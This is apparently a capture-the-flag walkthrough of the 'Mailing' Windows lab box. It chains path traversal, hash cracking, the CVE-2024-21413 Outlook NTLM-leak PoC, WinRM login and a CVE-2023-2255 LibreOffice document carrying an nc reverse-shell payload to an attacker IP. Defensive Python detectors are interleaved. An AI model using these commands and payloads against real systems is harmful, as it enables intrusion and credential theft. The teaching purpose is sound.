1. Overview
1.1. nmap
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# nmap -sCV 10.129.232.39 --max-retries 1 --min-rate 5000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-07 08:17 +04
Nmap scan report for 10.129.232.39
Host is up (0.18s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: TOP USER UIDL
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: RIGHTS=texkA0001 IDLE completed ACL IMAP4 QUOTA CHILDREN CAPABILITY OK IMAP4rev1 NAMESPACE SORT
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
587/tcp open smtp hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
993/tcp open ssl/imap hMailServer imapd
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: RIGHTS=texkA0001 IDLE completed ACL IMAP4 QUOTA CHILDREN CAPABILITY OK IMAP4rev1 NAMESPACE SORT
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open pando-pub?
49571/tcp open msrpc Microsoft Windows RPC
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-01-07T04:20:42
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 236.84 seconds
1.2. Web Discovery
A web page is being served, and it redirects to mailing.htb. After adding that name to /etc/hosts and visiting the site, the page below is shown.

At the bottom of the page there is a button for downloading the Instructions.

Downloading it yields a PDF. On its last page, page 16, the name Maya and the address maya@mailing.htb can be found.

2. Gaining Access
2.1. Confirming the LFI Vulnerability
An LFI (path traversal) vulnerability was confirmed in the file parameter of download.php: the request below returns the Windows hosts file.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# curl http://mailing.htb/download.php?file=../../windows/system32/drivers/etc/hosts
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 mailing.htb
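The traversal above works because download.php joins the file parameter onto its base directory without checking where the result lands. As an added illustration (not the box's own code), the vulnerable resolution is shown beside a hardened one, followed by a check that flags the same pattern in request logs; DOWNLOAD_ROOT, the simplified log format and the sample lines are constructed.

```python
import posixpath
from urllib.parse import unquote_plus

# Constructed example, not the box's download.php: the handler is assumed to
# serve files from one fixed directory and to receive the raw "file" value.
DOWNLOAD_ROOT = "/srv/mailing/downloads"

def vulnerable_resolve(root: str, user_file: str) -> str:
    """Behaviour the page exploits: the parameter is joined onto the base
    directory with no containment check, so "../" walks out of it."""
    return posixpath.normpath(posixpath.join(root, unquote_plus(user_file)))

def safe_resolve(root: str, user_file: str):
    """Hardened version: decode exactly once, treat backslashes as separators
    (IIS accepts both), reject absolute paths and drive letters, then require
    that the normalised result still lies inside root. None means reject."""
    decoded = unquote_plus(user_file).replace("\\", "/")
    if "\x00" in decoded or decoded.startswith("/") or ":" in decoded:
        return None
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, decoded))
    if not candidate.startswith(root_norm + "/"):
        return None  # escaped the directory, or named the directory itself
    return candidate

# Constructed request-log lines (method, URI stem, query string). A real IIS
# W3C log carries more columns; these three are all the check needs.
SAMPLE_LOG = [
    "GET /download.php file=instructions.pdf",
    "GET /download.php file=../../windows/system32/drivers/etc/hosts",
    "GET /download.php file=..%2F..%2FProgram+Files+(x86)%2FhMailServer%2Fbin%2FhMailServer.ini",
    "GET /index.php name=maya",
]

def traversal_requests(lines):
    """Retro-hunt: return the log lines whose "file" value safe_resolve
    would have rejected, i.e. the traversal pattern used on this box."""
    flagged = []
    for line in lines:
        _method, _stem, query = line.split(" ", 2)
        for param in query.split("&"):
            key, _, value = param.partition("=")
            if key == "file" and safe_resolve(DOWNLOAD_ROOT, value) is None:
                flagged.append(line)
                break
    return flagged
```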
2.2. Examining the hMailServer.ini File
hMailServer.ini is the configuration file for this mail server, and it is located at ../../Program+Files+(x86)/hMailServer/bin/hMailServer.ini, so we read its contents through the same traversal. The line AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7 can be found in it.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# curl 'http://mailing.htb/download.php?file=../../Program+Files+(x86)/hMailServer/bin/hMailServer.ini'
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1
This value is an unsalted MD5 hash, so we try to crack it with hashcat. The result is the password homenetworkingadministrator for the administrator account.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# echo '841bb5acfa6779ae432fd7a4e6600ba7' > hash
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# hashcat hash /usr/share/wordlists/rockyou.txt -m 0
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
841bb5acfa6779ae432fd7a4e6600ba7:homenetworkingadministrator
[...SNIP...]
2.3. Exploiting the Mail System Vulnerability
CVE-2024-21413 is an RCE vulnerability (in Microsoft Outlook, the client) that applies to this mail setup. Clone the PoC from GitHub at the path below.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# git clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability
Cloning into 'CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability'...
remote: Enumerating objects: 28, done.
remote: Counting objects: 100% (28/28), done.
remote: Compressing objects: 100% (27/27), done.
remote: Total 28 (delta 7), reused 6 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (28/28), 14.48 KiB | 2.07 MiB/s, done.
Resolving deltas: 100% (7/7), done.
The vulnerability works as follows. When a link such as file:///\<attacker IP>\test\file.txt is included in a message and the recipient clicks it, Outlook shows a security warning. If ! followed by an arbitrary string is appended, as in file:///\<attacker IP>\test\file.txt!any_string, that warning no longer appears.
┌──(root㉿kali)-[/home/kali/labs/Mailing/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability]
└─# python CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender test@mailing.htb --recipient maya@mailing.htb --url "\\10.10.14.143\share\ex" --subject "test"
CVE-2024-21413 | Microsoft Outlook Remote Code Execution Vulnerability PoC.
Alexander Hagenah / @xaitax / ah@primepage.de
✅ Email sent successfully.
After sending the mail, with an SMB server listening, the link gets clicked on the target; the connection then arrives at my Kali host authenticated as the maya account, delivering her Net-NTLMv2 hash.
┌──(root㉿kali)-[/home/kali]
└─# impacket-smbserver share . -smb2support
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.232.39,58440)
[*] AUTHENTICATE_MESSAGE (MAILING\maya,MAILING)
[*] User MAILING\maya authenticated successfully
[*] maya::MAILING:aaaaaaaaaaaaaaaa:2c43ba66185b120c2aee555362f37dd8:010100000000000000926bc6977fdc016067c32f4afb7675000000000100100041004200510058004b00430045004f000300100041004200510058004b00430045004f0002001000450069004c0065004f00730071006d0004001000450069004c0065004f00730071006d000700080000926bc6977fdc01060004000200000008003000300000000000000000000000002000006bef4fade26d91db97f0a8e73ce0facf77e36aed2b142e46bb03710cfed777fa0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100340033000000000000000000
[...SNIP...]
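An added defensive counterpart to the link trick described in 2.3 (not code from the PoC or the box): a mail-gateway check that finds file:// links pointing at a remote host and treats the "!" suffix as a hard block, since the click that follows hands the user's Net-NTLMv2 hash to that host. The regex, the Finding class and the sample message are constructed.

```python
import re
from dataclasses import dataclass

# Added example, not code from the xaitax PoC: a mail-gateway check for the
# link shape the page describes. Pattern and sample message are constructed.
UNC_FILE_LINK = re.compile(r"""
    file:                              # file: scheme
    (?: /{0,3}\\\\ | //(?=[^/\\]) )    # \\host in any slash style, or //host (not ///C:)
    (?P<host>[^\\/\s"'<>!:]+)          # remote host: where the NTLM handshake would go
    (?P<path>[^\s"'<>!]*)              # share and file path
    (?P<bang>![^\s"'<>]*)?             # the "!" suffix that suppresses Outlook's prompt
""", re.IGNORECASE | re.VERBOSE)

@dataclass
class Finding:
    link: str
    host: str
    bypass_suffix: bool  # True when the CVE-2024-21413 "!" form is present

def scan_message(body: str) -> list:
    """Return every file:// link to a remote host found in an email body."""
    return [Finding(m.group(0), m.group("host"), m.group("bang") is not None)
            for m in UNC_FILE_LINK.finditer(body)]

def verdict(findings) -> str:
    """Policy: any "!"-suffixed UNC link is blocked outright; a plain UNC
    file link still leaks NTLM on click, so it is quarantined for review."""
    if any(f.bypass_suffix for f in findings):
        return "block"
    return "quarantine" if findings else "allow"

# Constructed sample: 203.0.113.10 is a documentation address, not a real host.
SAMPLE_BODY = r"""<html><body>
<p>Please review the attached report.</p>
<a href="file:///\\203.0.113.10\share\report.docx!stage">Open report</a>
<a href="https://mailing.htb/instructions.pdf">Instructions</a>
<a href="file:///C:/Users/maya/notes.txt">local notes</a>
<a href="file://fileserver/public/minutes.odt">minutes</a>
</body></html>"""
```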
2.4. Obtaining maya's Credentials
Cracking the hash captured through smbserver gives the password m4y4ngs4ri.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# hashcat maya /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
MAYA::MAILING:aaaaaaaaaaaaaaaa:2c43ba66185b120c2aee555362f37dd8:010100000000000000926bc6977fdc016067c32f4afb7675000000000100100041004200510058004b00430045004f000300100041004200510058004b00430045004f0002001000450069004c0065004f00730071006d0004001000450069004c0065004f00730071006d000700080000926bc6977fdc01060004000200000008003000300000000000000000000000002000006bef4fade26d91db97f0a8e73ce0facf77e36aed2b142e46bb03710cfed777fa0a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100340033000000000000000000:m4y4ngs4ri
[...SNIP...]
2.5. Getting a Shell
Use nxc to check whether a WinRM login is possible. It is.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# nxc winrm 10.129.232.39 -u 'maya' -p 'm4y4ngs4ri'
WINRM 10.129.232.39 5985 MAILING [*] Windows 10 / Server 2019 Build 19041 (name:MAILING) (domain:MAILING)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.232.39 5985 MAILING [+] MAILING\maya:m4y4ngs4ri (Pwn3d!)
Log in with evil-winrm and read the flag from user.txt.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# evil-winrm -i 10.129.232.39 -u 'maya' -p 'm4y4ngs4ri'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maya\Documents> type ..\Desktop\user.txt
3. Privilege Escalation
3.1. Checking Privileges
First, check what the maya account is allowed to do. It holds no special privileges, so triggering an escalation through a weak privilege looks unlikely.
*Evil-WinRM* PS C:\Users\maya\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================ =======
SeChangeNotifyPrivilege Omitir comprobación de recorrido Enabled
SeUndockPrivilege Quitar equipo de la estación de acoplamiento Enabled
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Enabled
SeTimeZonePrivilege Cambiar la zona horaria Enabled
*Evil-WinRM* PS C:\Users\maya\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================ ================ ============ ==================================================
Todos Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Usuarios de escritorio remoto Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Usuarios autentificados Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Esta compañía Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Cuenta local Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Autenticación NTLM Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Etiqueta obligatoria\Nivel obligatorio medio Label S-1-16-8192
3.2. Identifying the Vulnerability with a PoC
Look through Program Files for any vulnerable software in use. Among the entries, LibreOffice stands out.
*Evil-WinRM* PS C:\Program Files> dir
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/27/2024 5:30 PM Common Files
d----- 3/3/2024 4:40 PM dotnet
d----- 3/3/2024 4:32 PM Git
d----- 4/29/2024 6:54 PM Internet Explorer
d----- 3/4/2024 6:57 PM LibreOffice
d----- 3/3/2024 4:06 PM Microsoft Update Health Tools
d----- 12/7/2019 10:14 AM ModifiableWindowsApps
d----- 2/27/2024 4:58 PM MSBuild
d----- 2/27/2024 5:30 PM OpenSSL-Win64
d----- 3/13/2024 4:49 PM PackageManagement
d----- 2/27/2024 4:58 PM Reference Assemblies
d----- 3/13/2024 4:48 PM RUXIM
d----- 2/27/2024 4:32 PM VMware
d----- 3/3/2024 5:13 PM Windows Defender
d----- 4/29/2024 6:54 PM Windows Defender Advanced Threat Protection
d----- 3/3/2024 5:13 PM Windows Mail
d----- 3/3/2024 5:13 PM Windows Media Player
d----- 4/29/2024 6:54 PM Windows Multimedia Platform
d----- 2/27/2024 4:26 PM Windows NT
d----- 3/3/2024 5:13 PM Windows Photo Viewer
d----- 4/29/2024 6:54 PM Windows Portable Devices
d----- 12/7/2019 10:31 AM Windows Security
d----- 3/13/2024 4:49 PM WindowsPowerShell
CVE-2023-2255 is a LibreOffice vulnerability, and the repository below is a PoC that triggers it. Clone it from GitHub.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# git clone https://github.com/elweth-sec/CVE-2023-2255.git
Cloning into 'CVE-2023-2255'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 10 (delta 2), reused 5 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (10/10), 8.47 KiB | 8.47 MiB/s, done.
Resolving deltas: 100% (2/2), done.
3.3. Exploiting the LibreOffice Vulnerability
When a document viewer opens a file that contains macros or external links, it normally shows a prompt once and asks whether the content should be trusted. This vulnerability skips that step, so a malicious macro prepared by the attacker runs automatically.
So we create an exploit.odt containing a script that opens a reverse shell via nc, and upload it to the important documents folder, whose files are opened automatically at regular intervals.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# cd CVE-2023-2255
┌──(root㉿kali)-[/home/kali/labs/Mailing/CVE-2023-2255]
└─# ls
CVE-2023-2255.py README.md samples webshell.php
┌──(root㉿kali)-[/home/kali/labs/Mailing/CVE-2023-2255]
└─# python CVE-2023-2255.py --cmd 'cmd.exe /c C:\ProgramData\nc.exe -e cmd.exe 10.10.14.143 443' --output exploit.odt
File exploit.odt has been created !
┌──(root㉿kali)-[/home/kali/labs/Mailing/CVE-2023-2255]
└─# ll
total 48
-rw-r--r-- 1 root root 1382 Jan 7 10:21 CVE-2023-2255.py
-rw-r--r-- 1 root root 30550 Jan 7 10:23 exploit.odt
-rw-r--r-- 1 root root 388 Jan 7 10:21 README.md
drwxr-xr-x 2 root root 4096 Jan 7 10:21 samples
-rw-r--r-- 1 root root 25 Jan 7 10:21 webshell.php
┌──(root㉿kali)-[/home/kali/labs/Mailing/CVE-2023-2255]
└─# smbclient '//10.129.232.39/important documents' --user maya --password m4y4ngs4ri
Try "help" to get a list of possible commands.
smb: \> put exploit.odt
putting file exploit.odt as \exploit.odt (37.2 kb/s) (average 37.2 kb/s)
smb: \>
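As an added example (not the PoC's code or any file from the box): a scanner for incoming ODT files that inventories the pieces the auto-open attack above relies on, an embedded Basic module and a document event listener bound to it, so a share like important documents can be screened before anything opens the file. The patterns, the risk ranking and the sample document are constructed; build_sample_odt produces a harmless stand-in, not exploit.odt.

```python
import io
import re
import zipfile

# Added example, not the PoC's code: scans an ODT package for the markers a
# document needs to run a script on open. Patterns and sample are constructed.
SCRIPT_EVENT = re.compile(r'<script:event-listener\b[^>]*vnd\.sun\.star\.script:[^>]*>', re.I)
EXTERNAL_HREF = re.compile(r'xlink:href="((?:[a-z][a-z0-9+.-]*://|file:|\\\\)[^"]*)"', re.I)
LIBRARY_META = ("script-lc.xml", "script-lb.xml")  # library indexes, not code

def scan_odf(data: bytes) -> dict:
    """Inventory of auto-execution indicators: embedded Basic modules,
    event listeners bound to scripts, and links that leave the document."""
    report = {"basic_modules": [], "script_events": [], "external_links": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        report["basic_modules"] = [n for n in names if n.startswith("Basic/")
                                   and n.endswith(".xml") and not n.endswith(LIBRARY_META)]
        for part in ("content.xml", "styles.xml"):
            if part in names:
                xml = zf.read(part).decode("utf-8", "replace")
                report["script_events"] += SCRIPT_EVENT.findall(xml)
                report["external_links"] += EXTERNAL_HREF.findall(xml)
    return report

def risk(report: dict) -> str:
    """Document event wired to an embedded script = the no-prompt auto-run case."""
    if report["script_events"] and report["basic_modules"]:
        return "critical"
    if any(report.values()):
        return "suspicious"
    return "clean"

def build_sample_odt(auto_exec: bool) -> bytes:
    """Constructed minimal ODT for exercising the scanner: it carries the
    structural markers only, not the PoC's document or any payload."""
    listener = ""
    if auto_exec:
        listener = ('<office:event-listeners><script:event-listener '
                    'script:event-name="dom:load" xlink:href="vnd.sun.star.script:'
                    'Standard.Module1.Main?language=Basic&amp;location=document"/>'
                    '</office:event-listeners>')
    content = (f'<office:document-content>{listener}<office:body><office:text>'
               '<text:p>Quarterly figures</text:p></office:text></office:body>'
               '</office:document-content>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text",
                    compress_type=zipfile.ZIP_STORED)  # ODF: stored, first entry
        zf.writestr("content.xml", content)
        if auto_exec:
            zf.writestr("Basic/Standard/Module1.xml",
                        '<script:module script:name="Module1">Sub Main\nEnd Sub</script:module>')
    return buf.getvalue()
```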
3.4. Obtaining Administrator Privileges
Then open a listener on port 443 and wait a short while; a shell with administrator privileges comes back.
┌──(root㉿kali)-[/home/kali/labs/Mailing]
└─# rlwrap -cAr nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.232.39] 64881
Microsoft Windows [Version 10.0.19045.4355]
(c) Microsoft Corporation. All rights reserved.
C:\Program Files\LibreOffice\program>whoami
whoami
mailing\localadmin
C:\Program Files\LibreOffice\program>cd C:\Users
cd C:\Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9502-BA18
Directory of C:\Users
2024-03-03 04:19 PM <DIR> .
2024-03-03 04:19 PM <DIR> ..
2024-02-28 08:50 PM <DIR> .NET v2.0
2024-02-28 08:50 PM <DIR> .NET v2.0 Classic
2024-02-28 08:50 PM <DIR> .NET v4.5
2024-02-28 08:50 PM <DIR> .NET v4.5 Classic
2024-02-28 08:50 PM <DIR> Classic .NET AppPool
2024-03-09 01:52 PM <DIR> DefaultAppPool
2024-03-04 08:32 PM <DIR> localadmin
2024-02-28 07:34 PM <DIR> maya
2024-03-10 04:56 PM <DIR> Public
0 File(s) 0 bytes
11 Dir(s) 4,628,033,536 bytes free
C:\Users>type .\localadmin\Desktop\root.txt